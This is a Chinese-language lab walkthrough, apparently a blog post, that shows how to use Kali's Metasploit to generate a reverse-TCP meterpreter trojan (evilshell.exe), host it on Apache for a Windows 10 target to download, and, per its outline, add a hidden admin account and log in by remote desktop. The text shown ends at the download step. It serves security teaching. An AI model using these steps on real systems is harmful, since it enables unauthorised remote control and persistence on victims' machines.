本文章仅供学习和参考!
欢迎交流~
目录
使用kali中的Metasploit生成木马,控制Windows系统
1. 攻击者IP(kali):192.168.112.130
2. 靶机IP(Windows10):192.168.112.136
3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:
4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:
6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe
7. 开启postgresql服务,其端口号为5432,输入命令:
11. 在靶机中双击运行木马文件(evilshell.exe)
14. 在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令:
15. kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令:
16. 使用 host$/密码 登录靶机,登录成功后,使用管理员权限打开cmd,添加一个新用户,添加成功则证明渗透成功!
一、实验题目:使用kali生成木马,渗透Windows系统
二、实验内容:
使用kali中的Metasploit生成木马,控制Windows系统
三、实验环境:
1. 攻击者IP(kali):192.168.112.130
2. 靶机IP(Windows10):192.168.112.136
三、实验步骤:
1. 保证两个系统能相互ping通
2. 生成木马,在kali打开终端,输入以下命令:
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者IP lport=监听端口 -f 后门文件类型 >/后门文件存放路径/evilshell.exe
3. 进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html,输入命令:
cp evilshell.exe /var/www/html
4. 进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:
rm 文件1 文件2 ... 文件n
5. 开启apache服务,输入命令:
/etc/init.d/apache2 start
可用以下命令查看服务开启状态:
/etc/init.d/apache2 status
6. 在Windows10靶机上打开浏览器,输入kali的IP,访问kali并下载木马文件evilshell.exe
将文件下载到桌面,方便测试: